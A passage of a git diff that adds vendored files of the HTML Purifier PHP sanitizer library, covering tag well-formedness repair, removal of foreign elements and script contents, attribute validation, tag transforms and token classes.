real empty token + $ok = true; + } elseif ($token instanceof HTMLPurifier_Token_Start) { + // start tag + + // ...unless they also have to close their parent + if (!empty($this->stack)) { + + // Performance note: you might think that it's rather + // inefficient, recalculating the autoclose information + // for every tag that a token closes (since when we + // do an autoclose, we push a new token into the + // stream and then /process/ that, before + // re-processing this token.) But this is + // necessary, because an injector can make an + // arbitrary transformations to the autoclosing + // tokens we introduce, so things may have changed + // in the meantime. Also, doing the inefficient thing is + // "easy" to reason about (for certain perverse definitions + // of "easy") + + $parent = array_pop($this->stack); + $this->stack[] = $parent; + + if (isset($definition->info[$parent->name])) { + $elements = $definition->info[$parent->name]->child->getAllowedElements($config); + $autoclose = !isset($elements[$token->name]); + } else { + $autoclose = false; + } + + if ($autoclose && $definition->info[$token->name]->wrap) { + // Check if an element can be wrapped by another + // element to make it valid in a context (for + // example, <ul><ul> needs a <li> in between) + $wrapname = $definition->info[$token->name]->wrap; + $wrapdef = $definition->info[$wrapname]; + $elements = $wrapdef->child->getAllowedElements($config); + $parent_elements = $definition->info[$parent->name]->child->getAllowedElements($config); + if (isset($elements[$token->name]) && isset($parent_elements[$wrapname])) { + $newtoken = new HTMLPurifier_Token_Start($wrapname); + $this->insertBefore($newtoken); + $reprocess = true; + continue; + } + } + + $carryover = false; + if ($autoclose && $definition->info[$parent->name]->formatting) { + $carryover = true; + } + + if ($autoclose) { + // check if this autoclose is doomed to fail + // (this rechecks $parent, which his harmless) + $autoclose_ok = isset($global_parent_allowed_elements[$token->name]); + if (!$autoclose_ok) { + foreach ($this->stack as $ancestor) { + $elements = $definition->info[$ancestor->name]->child->getAllowedElements($config); + if (isset($elements[$token->name])) { + $autoclose_ok = true; + break; + } + if ($definition->info[$token->name]->wrap) { + $wrapname = $definition->info[$token->name]->wrap; + $wrapdef = $definition->info[$wrapname]; + $wrap_elements = $wrapdef->child->getAllowedElements($config); + if (isset($wrap_elements[$token->name]) && isset($elements[$wrapname])) { + $autoclose_ok = true; + break; + } + } + } + } + if ($autoclose_ok) { + // errors need to be updated + $new_token = new HTMLPurifier_Token_End($parent->name); + $new_token->start = $parent; + if ($carryover) { + $element = clone $parent; + // [TagClosedAuto] + $element->armor['MakeWellFormed_TagClosedError'] = true; + $element->carryover = true; + $this->processToken(array($new_token, $token, $element)); + } else { + $this->insertBefore($new_token); + } + // [TagClosedSuppress] + if ($e && !isset($parent->armor['MakeWellFormed_TagClosedError'])) { + if (!$carryover) { + $e->send(E_NOTICE, 'Strategy_MakeWellFormed: Tag auto closed', $parent); + } else { + $e->send(E_NOTICE, 'Strategy_MakeWellFormed: Tag carryover', $parent); + } + } + } else { + $this->remove(); + } + $reprocess = true; + continue; + } + + } + $ok = true; + } + + if ($ok) { + foreach ($this->injectors as $i => $injector) { + if (isset($token->skip[$i])) continue; + if ($token->rewind !== null && $token->rewind !== $i) continue; + $injector->handleElement($token); + $this->processToken($token, $i); + $reprocess = true; + break; + } + if (!$reprocess) { + // ah, nothing interesting happened; do normal processing + $this->swap($token); + if ($token instanceof HTMLPurifier_Token_Start) { + $this->stack[] = $token; + } elseif ($token instanceof HTMLPurifier_Token_End) { + throw new HTMLPurifier_Exception('Improper handling of end tag in start code; possible error in MakeWellFormed'); + } + } + continue; + } + + // sanity check: we should be dealing with a closing tag + if (!$token instanceof HTMLPurifier_Token_End) { + throw new HTMLPurifier_Exception('Unaccounted for tag token in input stream, bug in HTML Purifier'); + } + + // make sure that we have something open + if (empty($this->stack)) { + if ($escape_invalid_tags) { + if ($e) $e->send(E_WARNING, 'Strategy_MakeWellFormed: Unnecessary end tag to text'); + $this->swap(new HTMLPurifier_Token_Text( + $generator->generateFromToken($token) + )); + } else { + $this->remove(); + if ($e) $e->send(E_WARNING, 'Strategy_MakeWellFormed: Unnecessary end tag removed'); + } + $reprocess = true; + continue; + } + + // first, check for the simplest case: everything closes neatly. + // Eventually, everything passes through here; if there are problems + // we modify the input stream accordingly and then punt, so that + // the tokens get processed again. + $current_parent = array_pop($this->stack); + if ($current_parent->name == $token->name) { + $token->start = $current_parent; + foreach ($this->injectors as $i => $injector) { + if (isset($token->skip[$i])) continue; + if ($token->rewind !== null && $token->rewind !== $i) continue; + $injector->handleEnd($token); + $this->processToken($token, $i); + $this->stack[] = $current_parent; + $reprocess = true; + break; + } + continue; + } + + // okay, so we're trying to close the wrong tag + + // undo the pop previous pop + $this->stack[] = $current_parent; + + // scroll back the entire nest, trying to find our tag. + // (feature could be to specify how far you'd like to go) + $size = count($this->stack); + // -2 because -1 is the last element, but we already checked that + $skipped_tags = false; + for ($j = $size - 2; $j >= 0; $j--) { + if ($this->stack[$j]->name == $token->name) { + $skipped_tags = array_slice($this->stack, $j); + break; + } + } + + // we didn't find the tag, so remove + if ($skipped_tags === false) { + if ($escape_invalid_tags) { + $this->swap(new HTMLPurifier_Token_Text( + $generator->generateFromToken($token) + )); + if ($e) $e->send(E_WARNING, 'Strategy_MakeWellFormed: Stray end tag to text'); + } else { + $this->remove(); + if ($e) $e->send(E_WARNING, 'Strategy_MakeWellFormed: Stray end tag removed'); + } + $reprocess = true; + continue; + } + + // do errors, in REVERSE $j order: a,b,c with </a></b></c> + $c = count($skipped_tags); + if ($e) { + for ($j = $c - 1; $j > 0; $j--) { + // notice we exclude $j == 0, i.e. the current ending tag, from + // the errors... [TagClosedSuppress] + if (!isset($skipped_tags[$j]->armor['MakeWellFormed_TagClosedError'])) { + $e->send(E_NOTICE, 'Strategy_MakeWellFormed: Tag closed by element end', $skipped_tags[$j]); + } + } + } + + // insert tags, in FORWARD $j order: c,b,a with </a></b></c> + $replace = array($token); + for ($j = 1; $j < $c; $j++) { + // ...as well as from the insertions + $new_token = new HTMLPurifier_Token_End($skipped_tags[$j]->name); + $new_token->start = $skipped_tags[$j]; + array_unshift($replace, $new_token); + if (isset($definition->info[$new_token->name]) && $definition->info[$new_token->name]->formatting) { + // [TagClosedAuto] + $element = clone $skipped_tags[$j]; + $element->carryover = true; + $element->armor['MakeWellFormed_TagClosedError'] = true; + $replace[] = $element; + } + } + $this->processToken($replace); + $reprocess = true; + continue; + } + + $context->destroy('CurrentNesting'); + $context->destroy('InputTokens'); + $context->destroy('InputIndex'); + $context->destroy('CurrentToken'); + + unset($this->injectors, $this->stack, $this->tokens, $this->t); + return $tokens; + } + + /** + * Processes arbitrary token values for complicated substitution patterns. + * In general: + * + * If $token is an array, it is a list of tokens to substitute for the + * current token. These tokens then get individually processed. If there + * is a leading integer in the list, that integer determines how many + * tokens from the stream should be removed. + * + * If $token is a regular token, it is swapped with the current token. + * + * If $token is false, the current token is deleted. + * + * If $token is an integer, that number of tokens (with the first token + * being the current one) will be deleted. + * + * @param $token Token substitution value + * @param $injector Injector that performed the substitution; default is if + * this is not an injector related operation. + */ + protected function processToken($token, $injector = -1) { + + // normalize forms of token + if (is_object($token)) $token = array(1, $token); + if (is_int($token)) $token = array($token); + if ($token === false) $token = array(1); + if (!is_array($token)) throw new HTMLPurifier_Exception('Invalid token type from injector'); + if (!is_int($token[0])) array_unshift($token, 1); + if ($token[0] === 0) throw new HTMLPurifier_Exception('Deleting zero tokens is not valid'); + + // $token is now an array with the following form: + // array(number nodes to delete, new node 1, new node 2, ...) + + $delete = array_shift($token); + $old = array_splice($this->tokens, $this->t, $delete, $token); + + if ($injector > -1) { + // determine appropriate skips + $oldskip = isset($old[0]) ? $old[0]->skip : array(); + foreach ($token as $object) { + $object->skip = $oldskip; + $object->skip[$injector] = true; + } + } + + } + + /** + * Inserts a token before the current token. Cursor now points to + * this token. You must reprocess after this. + */ + private function insertBefore($token) { + array_splice($this->tokens, $this->t, 0, array($token)); + } + + /** + * Removes current token. Cursor now points to new token occupying previously + * occupied space. You must reprocess after this. + */ + private function remove() { + array_splice($this->tokens, $this->t, 1); + } + + /** + * Swap current token with new token. Cursor points to new token (no + * change). You must reprocess after this. + */ + private function swap($token) { + $this->tokens[$this->t] = $token; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Strategy/RemoveForeignElements.php b/lib/htmlpurifier/library/HTMLPurifier/Strategy/RemoveForeignElements.php new file mode 100644 index 000000000..bccaf14d3 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Strategy/RemoveForeignElements.php @@ -0,0 +1,188 @@ +<?php + +/** + * Removes all unrecognized tags from the list of tokens. + * + * This strategy iterates through all the tokens and removes unrecognized + * tokens. If a token is not recognized but a TagTransform is defined for + * that element, the element will be transformed accordingly. + */ + +class HTMLPurifier_Strategy_RemoveForeignElements extends HTMLPurifier_Strategy +{ + + public function execute($tokens, $config, $context) { + $definition = $config->getHTMLDefinition(); + $generator = new HTMLPurifier_Generator($config, $context); + $result = array(); + + $escape_invalid_tags = $config->get('Core.EscapeInvalidTags'); + $remove_invalid_img = $config->get('Core.RemoveInvalidImg'); + + // currently only used to determine if comments should be kept + $trusted = $config->get('HTML.Trusted'); + $comment_lookup = $config->get('HTML.AllowedComments'); + $comment_regexp = $config->get('HTML.AllowedCommentsRegexp'); + $check_comments = $comment_lookup !== array() || $comment_regexp !== null; + + $remove_script_contents = $config->get('Core.RemoveScriptContents'); + $hidden_elements = $config->get('Core.HiddenElements'); + + // remove script contents compatibility + if ($remove_script_contents === true) { + $hidden_elements['script'] = true; + } elseif ($remove_script_contents === false && isset($hidden_elements['script'])) { + unset($hidden_elements['script']); + } + + $attr_validator = new HTMLPurifier_AttrValidator(); + + // removes tokens until it reaches a closing tag with its value + $remove_until = false; + + // converts comments into text tokens when this is equal to a tag name + $textify_comments = false; + + $token = false; + $context->register('CurrentToken', $token); + + $e = false; + if ($config->get('Core.CollectErrors')) { + $e =& $context->get('ErrorCollector'); + } + + foreach($tokens as $token) { + if ($remove_until) { + if (empty($token->is_tag) || $token->name !== $remove_until) { + continue; + } + } + if (!empty( $token->is_tag )) { + // DEFINITION CALL + + // before any processing, try to transform the element + if ( + isset($definition->info_tag_transform[$token->name]) + ) { + $original_name = $token->name; + // there is a transformation for this tag + // DEFINITION CALL + $token = $definition-> + info_tag_transform[$token->name]-> + transform($token, $config, $context); + if ($e) $e->send(E_NOTICE, 'Strategy_RemoveForeignElements: Tag transform', $original_name); + } + + if (isset($definition->info[$token->name])) { + + // mostly everything's good, but + // we need to make sure required attributes are in order + if ( + ($token instanceof HTMLPurifier_Token_Start || $token instanceof HTMLPurifier_Token_Empty) && + $definition->info[$token->name]->required_attr && + ($token->name != 'img' || $remove_invalid_img) // ensure config option still works + ) { + $attr_validator->validateToken($token, $config, $context); + $ok = true; + foreach ($definition->info[$token->name]->required_attr as $name) { + if (!isset($token->attr[$name])) { + $ok = false; + break; + } + } + if (!$ok) { + if ($e) $e->send(E_ERROR, 'Strategy_RemoveForeignElements: Missing required attribute', $name); + continue; + } + $token->armor['ValidateAttributes'] = true; + } + + if (isset($hidden_elements[$token->name]) && $token instanceof HTMLPurifier_Token_Start) { + $textify_comments = $token->name; + } elseif ($token->name === $textify_comments && $token instanceof HTMLPurifier_Token_End) { + $textify_comments = false; + } + + } elseif ($escape_invalid_tags) { + // invalid tag, generate HTML representation and insert in + if ($e) $e->send(E_WARNING, 'Strategy_RemoveForeignElements: Foreign element to text'); + $token = new HTMLPurifier_Token_Text( + $generator->generateFromToken($token) + ); + } else { + // check if we need to destroy all of the tag's children + // CAN BE GENERICIZED + if (isset($hidden_elements[$token->name])) { + if ($token instanceof HTMLPurifier_Token_Start) { + $remove_until = $token->name; + } elseif ($token instanceof HTMLPurifier_Token_Empty) { + // do nothing: we're still looking + } else { + $remove_until = false; + } + if ($e) $e->send(E_ERROR, 'Strategy_RemoveForeignElements: Foreign meta element removed'); + } else { + if ($e) $e->send(E_ERROR, 'Strategy_RemoveForeignElements: Foreign element removed'); + } + continue; + } + } elseif ($token instanceof HTMLPurifier_Token_Comment) { + // textify comments in script tags when they are allowed + if ($textify_comments !== false) { + $data = $token->data; + $token = new HTMLPurifier_Token_Text($data); + } elseif ($trusted || $check_comments) { + // always cleanup comments + $trailing_hyphen = false; + if ($e) { + // perform check whether or not there's a trailing hyphen + if (substr($token->data, -1) == '-') { + $trailing_hyphen = true; + } + } + $token->data = rtrim($token->data, '-'); + $found_double_hyphen = false; + while (strpos($token->data, '--') !== false) { + $found_double_hyphen = true; + $token->data = str_replace('--', '-', $token->data); + } + if ($trusted || !empty($comment_lookup[trim($token->data)]) || ($comment_regexp !== NULL && preg_match($comment_regexp, trim($token->data)))) { + // OK good + if ($e) { + if ($trailing_hyphen) { + $e->send(E_NOTICE, 'Strategy_RemoveForeignElements: Trailing hyphen in comment removed'); + } + if ($found_double_hyphen) { + $e->send(E_NOTICE, 'Strategy_RemoveForeignElements: Hyphens in comment collapsed'); + } + } + } else { + if ($e) { + $e->send(E_NOTICE, 'Strategy_RemoveForeignElements: Comment removed'); + } + continue; + } + } else { + // strip comments + if ($e) $e->send(E_NOTICE, 'Strategy_RemoveForeignElements: Comment removed'); + continue; + } + } elseif ($token instanceof HTMLPurifier_Token_Text) { + } else { + continue; + } + $result[] = $token; + } + if ($remove_until && $e) { + // we removed tokens until the end, throw error + $e->send(E_ERROR, 'Strategy_RemoveForeignElements: Token removed to end', $remove_until); + } + + $context->destroy('CurrentToken'); + + return $result; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Strategy/ValidateAttributes.php b/lib/htmlpurifier/library/HTMLPurifier/Strategy/ValidateAttributes.php new file mode 100644 index 000000000..c3328a9d4 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Strategy/ValidateAttributes.php @@ -0,0 +1,39 @@ +<?php + +/** + * Validate all attributes in the tokens. + */ + +class HTMLPurifier_Strategy_ValidateAttributes extends HTMLPurifier_Strategy +{ + + public function execute($tokens, $config, $context) { + + // setup validator + $validator = new HTMLPurifier_AttrValidator(); + + $token = false; + $context->register('CurrentToken', $token); + + foreach ($tokens as $key => $token) { + + // only process tokens that have attributes, + // namely start and empty tags + if (!$token instanceof HTMLPurifier_Token_Start && !$token instanceof HTMLPurifier_Token_Empty) continue; + + // skip tokens that are armored + if (!empty($token->armor['ValidateAttributes'])) continue; + + // note that we have no facilities here for removing tokens + $validator->validateToken($token, $config, $context); + + $tokens[$key] = $token; // for PHP 4 + } + $context->destroy('CurrentToken'); + + return $tokens; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/StringHash.php b/lib/htmlpurifier/library/HTMLPurifier/StringHash.php new file mode 100644 index 000000000..62085c5c2 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/StringHash.php @@ -0,0 +1,39 @@ +<?php + +/** + * This is in almost every respect equivalent to an array except + * that it keeps track of which keys were accessed. + * + * @warning For the sake of backwards compatibility with early versions + * of PHP 5, you must not use the $hash[$key] syntax; if you do + * our version of offsetGet is never called. + */ +class HTMLPurifier_StringHash extends ArrayObject +{ + protected $accessed = array(); + + /** + * Retrieves a value, and logs the access. + */ + public function offsetGet($index) { + $this->accessed[$index] = true; + return parent::offsetGet($index); + } + + /** + * Returns a lookup array of all array indexes that have been accessed. + * @return Array in form array($index => true). + */ + public function getAccessed() { + return $this->accessed; + } + + /** + * Resets the access array. + */ + public function resetAccessed() { + $this->accessed = array(); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/StringHashParser.php b/lib/htmlpurifier/library/HTMLPurifier/StringHashParser.php new file mode 100644 index 000000000..f3e70c712 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/StringHashParser.php @@ -0,0 +1,110 @@ +<?php + +/** + * Parses string hash files. File format is as such: + * + * DefaultKeyValue + * KEY: Value + * KEY2: Value2 + * --MULTILINE-KEY-- + * Multiline + * value. + * + * Which would output something similar to: + * + * array( + * 'ID' => 'DefaultKeyValue', + * 'KEY' => 'Value', + * 'KEY2' => 'Value2', + * 'MULTILINE-KEY' => "Multiline\nvalue.\n", + * ) + * + * We use this as an easy to use file-format for configuration schema + * files, but the class itself is usage agnostic. + * + * You can use ---- to forcibly terminate parsing of a single string-hash; + * this marker is used in multi string-hashes to delimit boundaries. + */ +class HTMLPurifier_StringHashParser +{ + + public $default = 'ID'; + + /** + * Parses a file that contains a single string-hash. + */ + public function parseFile($file) { + if (!file_exists($file)) return false; + $fh = fopen($file, 'r'); + if (!$fh) return false; + $ret = $this->parseHandle($fh); + fclose($fh); + return $ret; + } + + /** + * Parses a file that contains multiple string-hashes delimited by '----' + */ + public function parseMultiFile($file) { + if (!file_exists($file)) return false; + $ret = array(); + $fh = fopen($file, 'r'); + if (!$fh) return false; + while (!feof($fh)) { + $ret[] = $this->parseHandle($fh); + } + fclose($fh); + return $ret; + } + + /** + * Internal parser that acepts a file handle. + * @note While it's possible to simulate in-memory parsing by using + * custom stream wrappers, if such a use-case arises we should + * factor out the file handle into its own class. + * @param $fh File handle with pointer at start of valid string-hash + * block. + */ + protected function parseHandle($fh) { + $state = false; + $single = false; + $ret = array(); + do { + $line = fgets($fh); + if ($line === false) break; + $line = rtrim($line, "\n\r"); + if (!$state && $line === '') continue; + if ($line === '----') break; + if (strncmp('--#', $line, 3) === 0) { + // Comment + continue; + } elseif (strncmp('--', $line, 2) === 0) { + // Multiline declaration + $state = trim($line, '- '); + if (!isset($ret[$state])) $ret[$state] = ''; + continue; + } elseif (!$state) { + $single = true; + if (strpos($line, ':') !== false) { + // Single-line declaration + list($state, $line) = explode(':', $line, 2); + $line = trim($line); + } else { + // Use default declaration + $state = $this->default; + } + } + if ($single) { + $ret[$state] = $line; + $single = false; + $state = false; + } else { + $ret[$state] .= "$line\n"; + } + } while (!feof($fh)); + return $ret; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/TagTransform.php b/lib/htmlpurifier/library/HTMLPurifier/TagTransform.php new file mode 100644 index 000000000..210a44721 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/TagTransform.php @@ -0,0 +1,36 @@ +<?php + +/** + * Defines a mutation of an obsolete tag into a valid tag. + */ +abstract class HTMLPurifier_TagTransform +{ + + /** + * Tag name to transform the tag to. + */ + public $transform_to; + + /** + * Transforms the obsolete tag into the valid tag. + * @param $tag Tag to be transformed. + * @param $config Mandatory HTMLPurifier_Config object + * @param $context Mandatory HTMLPurifier_Context object + */ + abstract public function transform($tag, $config, $context); + + /** + * Prepends CSS properties to the style attribute, creating the + * attribute if it doesn't exist. + * @warning Copied over from AttrTransform, be sure to keep in sync + * @param $attr Attribute array to process (passed by reference) + * @param $css CSS to prepend + */ + protected function prependCSS(&$attr, $css) { + $attr['style'] = isset($attr['style']) ? $attr['style'] : ''; + $attr['style'] = $css . $attr['style']; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/TagTransform/Font.php b/lib/htmlpurifier/library/HTMLPurifier/TagTransform/Font.php new file mode 100644 index 000000000..9db2db795 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/TagTransform/Font.php @@ -0,0 +1,98 @@ +<?php + +/** + * Transforms FONT tags to the proper form (SPAN with CSS styling) + * + * This transformation takes the three proprietary attributes of FONT and + * transforms them into their corresponding CSS attributes. These are color, + * face, and size. + * + * @note Size is an interesting case because it doesn't map cleanly to CSS. + * Thanks to + * http://style.cleverchimp.com/font_size_intervals/altintervals.html + * for reasonable mappings. + * @warning This doesn't work completely correctly; specifically, this + * TagTransform operates before well-formedness is enforced, so + * the "active formatting elements" algorithm doesn't get applied. + */ +class HTMLPurifier_TagTransform_Font extends HTMLPurifier_TagTransform +{ + + public $transform_to = 'span'; + + protected $_size_lookup = array( + '0' => 'xx-small', + '1' => 'xx-small', + '2' => 'small', + '3' => 'medium', + '4' => 'large', + '5' => 'x-large', + '6' => 'xx-large', + '7' => '300%', + '-1' => 'smaller', + '-2' => '60%', + '+1' => 'larger', + '+2' => '150%', + '+3' => '200%', + '+4' => '300%' + ); + + public function transform($tag, $config, $context) { + + if ($tag instanceof HTMLPurifier_Token_End) { + $new_tag = clone $tag; + $new_tag->name = $this->transform_to; + return $new_tag; + } + + $attr = $tag->attr; + $prepend_style = ''; + + // handle color transform + if (isset($attr['color'])) { + $prepend_style .= 'color:' . $attr['color'] . ';'; + unset($attr['color']); + } + + // handle face transform + if (isset($attr['face'])) { + $prepend_style .= 'font-family:' . $attr['face'] . ';'; + unset($attr['face']); + } + + // handle size transform + if (isset($attr['size'])) { + // normalize large numbers + if ($attr['size'] !== '') { + if ($attr['size']{0} == '+' || $attr['size']{0} == '-') { + $size = (int) $attr['size']; + if ($size < -2) $attr['size'] = '-2'; + if ($size > 4) $attr['size'] = '+4'; + } else { + $size = (int) $attr['size']; + if ($size > 7) $attr['size'] = '7'; + } + } + if (isset($this->_size_lookup[$attr['size']])) { + $prepend_style .= 'font-size:' . + $this->_size_lookup[$attr['size']] . ';'; + } + unset($attr['size']); + } + + if ($prepend_style) { + $attr['style'] = isset($attr['style']) ? + $prepend_style . $attr['style'] : + $prepend_style; + } + + $new_tag = clone $tag; + $new_tag->name = $this->transform_to; + $new_tag->attr = $attr; + + return $new_tag; + + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/TagTransform/Simple.php b/lib/htmlpurifier/library/HTMLPurifier/TagTransform/Simple.php new file mode 100644 index 000000000..0e36130f2 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/TagTransform/Simple.php @@ -0,0 +1,35 @@ +<?php + +/** + * Simple transformation, just change tag name to something else, + * and possibly add some styling. This will cover most of the deprecated + * tag cases. + */ +class HTMLPurifier_TagTransform_Simple extends HTMLPurifier_TagTransform +{ + + protected $style; + + /** + * @param $transform_to Tag name to transform to. + * @param $style CSS style to add to the tag + */ + public function __construct($transform_to, $style = null) { + $this->transform_to = $transform_to; + $this->style = $style; + } + + public function transform($tag, $config, $context) { + $new_tag = clone $tag; + $new_tag->name = $this->transform_to; + if (!is_null($this->style) && + ($new_tag instanceof HTMLPurifier_Token_Start || $new_tag instanceof HTMLPurifier_Token_Empty) + ) { + $this->prependCSS($new_tag->attr, $this->style); + } + return $new_tag; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Token.php b/lib/htmlpurifier/library/HTMLPurifier/Token.php new file mode 100644 index 000000000..7900e6cb1 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Token.php @@ -0,0 +1,57 @@ +<?php + +/** + * Abstract base token class that all others inherit from. + */ +class HTMLPurifier_Token { + public $line; /**< Line number node was on in source document. Null if unknown. */ + public $col; /**< Column of line node was on in source document. Null if unknown. */ + + /** + * Lookup array of processing that this token is exempt from. + * Currently, valid values are "ValidateAttributes" and + * "MakeWellFormed_TagClosedError" + */ + public $armor = array(); + + /** + * Used during MakeWellFormed. + */ + public $skip; + public $rewind; + public $carryover; + + public function __get($n) { + if ($n === 'type') { + trigger_error('Deprecated type property called; use instanceof', E_USER_NOTICE); + switch (get_class($this)) { + case 'HTMLPurifier_Token_Start': return 'start'; + case 'HTMLPurifier_Token_Empty': return 'empty'; + case 'HTMLPurifier_Token_End': return 'end'; + case 'HTMLPurifier_Token_Text': return 'text'; + case 'HTMLPurifier_Token_Comment': return 'comment'; + default: return null; + } + } + } + + /** + * Sets the position of the token in the source document. + */ + public function position($l = null, $c = null) { + $this->line = $l; + $this->col = $c; + } + + /** + * Convenience function for DirectLex settings line/col position. + */ + public function rawPosition($l, $c) { + if ($c === -1) $l++; + $this->line = $l; + $this->col = $c; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Token/Comment.php b/lib/htmlpurifier/library/HTMLPurifier/Token/Comment.php new file mode 100644 index 000000000..dc6bdcabb --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Token/Comment.php @@ -0,0 +1,22 @@ +<?php + +/** + * Concrete comment token class. Generally will be ignored. + */ +class HTMLPurifier_Token_Comment extends HTMLPurifier_Token +{ + public $data; /**< Character data within comment. */ + public $is_whitespace = true; + /** + * Transparent constructor. + * + * @param $data String comment data. + */ + public function __construct($data, $line = null, $col = null) { + $this->data = $data; + $this->line = $line; + $this->col = $col; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Token/Empty.php b/lib/htmlpurifier/library/HTMLPurifier/Token/Empty.php new file mode 100644 index 000000000..2a82b47ad --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Token/Empty.php @@ -0,0 +1,11 @@ +<?php + +/** + * Concrete empty token class. + */ +class HTMLPurifier_Token_Empty extends HTMLPurifier_Token_Tag +{ + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Token/End.php b/lib/htmlpurifier/library/HTMLPurifier/Token/End.php new file mode 100644 index 000000000..353e79daf --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Token/End.php @@ -0,0 +1,19 @@ +<?php + +/** + * Concrete end token class. + * + * @warning This class accepts attributes even though end tags cannot. This + * is for optimization reasons, as under normal circumstances, the Lexers + * do not pass attributes. + */ +class HTMLPurifier_Token_End extends HTMLPurifier_Token_Tag +{ + /** + * Token that started this node. Added by MakeWellFormed. Please + * do not edit this! + */ + public $start; +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Token/Start.php b/lib/htmlpurifier/library/HTMLPurifier/Token/Start.php new file mode 100644 index 000000000..e0e14fc62 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Token/Start.php @@ -0,0 +1,11 @@ +<?php + +/** + * Concrete start token class. + */ +class HTMLPurifier_Token_Start extends HTMLPurifier_Token_Tag +{ + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Token/Tag.php b/lib/htmlpurifier/library/HTMLPurifier/Token/Tag.php new file mode 100644 index 000000000..f4d8f640e --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Token/Tag.php @@ -0,0 +1,57 @@ +<?php + +/** + * Abstract class of a tag token (start, end or empty), and its behavior. + */ +class HTMLPurifier_Token_Tag extends HTMLPurifier_Token +{ + /** + * Static bool marker that indicates the class is a tag. + * + * This allows us to check objects with <tt>!empty($obj->is_tag)</tt> + * without having to use a function call <tt>is_a()</tt>. + */ + public $is_tag = true; + + /** + * The lower-case name of the tag, like 'a', 'b' or 'blockquote'. + * + * @note Strictly speaking, XML tags are case sensitive, so we shouldn't + * be lower-casing them, but these tokens cater to HTML tags, which are + * insensitive. + */ + public $name; + + /** + * Associative array of the tag's attributes. + */ + public $attr = array(); + + /** + * Non-overloaded constructor, which lower-cases passed tag name. + * + * @param $name String name. + * @param $attr Associative array of attributes. + */ + public function __construct($name, $attr = array(), $line = null, $col = null, $armor = array()) { + $this->name = ctype_lower($name) ? $name : strtolower($name); + foreach ($attr as $key => $value) { + // normalization only necessary when key is not lowercase + if (!ctype_lower($key)) { + $new_key = strtolower($key); + if (!isset($attr[$new_key])) { + $attr[$new_key] = $attr[$key]; + } + if ($new_key !== $key) { + unset($attr[$key]); + } + } + } + $this->attr = $attr; + $this->line = $line; + $this->col = $col; + $this->armor = $armor; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Token/Text.php b/lib/htmlpurifier/library/HTMLPurifier/Token/Text.php new file mode 100644 index 000000000..82efd823d --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Token/Text.php @@ -0,0 +1,33 @@ +<?php + +/** + * Concrete text token class. + * + * Text tokens comprise of regular parsed character data (PCDATA) and raw + * character data (from the CDATA sections). Internally, their + * data is parsed with all entities expanded. Surprisingly, the text token + * does have a "tag name" called #PCDATA, which is how the DTD represents it + * in permissible child nodes. + */ +class HTMLPurifier_Token_Text extends HTMLPurifier_Token +{ + + public $name = '#PCDATA'; /**< PCDATA tag name compatible with DTD. */ + public $data; /**< Parsed character data of text. */ + public $is_whitespace; /**< Bool indicating if node is whitespace. */ + + /** + * Constructor, accepts data and determines if it is whitespace. + * + * @param $data String parsed character data. + */ + public function __construct($data, $line = null, $col = null) { + $this->data = $data; + $this->is_whitespace = ctype_space($data); + $this->line = $line; + $this->col = $col; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/TokenFactory.php b/lib/htmlpurifier/library/HTMLPurifier/TokenFactory.php new file mode 100644 index 000000000..7cf48fb41 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/TokenFactory.php @@ -0,0 +1,94 @@ +<?php + +/** + * Factory for token generation. + * + * @note Doing some benchmarking indicates that the new operator is much + * slower than the clone operator (even discounting the cost of the + * constructor). This class is for that optimization. + * Other then that, there's not much point as we don't + * maintain parallel HTMLPurifier_Token hierarchies (the main reason why + * you'd want to use an abstract factory). + * @todo Port DirectLex to use this + */ +class HTMLPurifier_TokenFactory +{ + + /** + * Prototypes that will be cloned. + * @private + */ + // p stands for prototype + private $p_start, $p_end, $p_empty, $p_text, $p_comment; + + /** + * Generates blank prototypes for cloning. + */ + public function __construct() { + $this->p_start = new HTMLPurifier_Token_Start('', array()); + $this->p_end = new HTMLPurifier_Token_End(''); + $this->p_empty = new HTMLPurifier_Token_Empty('', array()); + $this->p_text = new HTMLPurifier_Token_Text(''); + $this->p_comment= new HTMLPurifier_Token_Comment(''); + } + + /** + * Creates a HTMLPurifier_Token_Start. + * @param $name Tag name + * @param $attr Associative array of attributes + * @return Generated HTMLPurifier_Token_Start + */ + public function createStart($name, $attr = array()) { + $p = clone $this->p_start; + $p->__construct($name, $attr); + return $p; + } + + /** + * Creates a 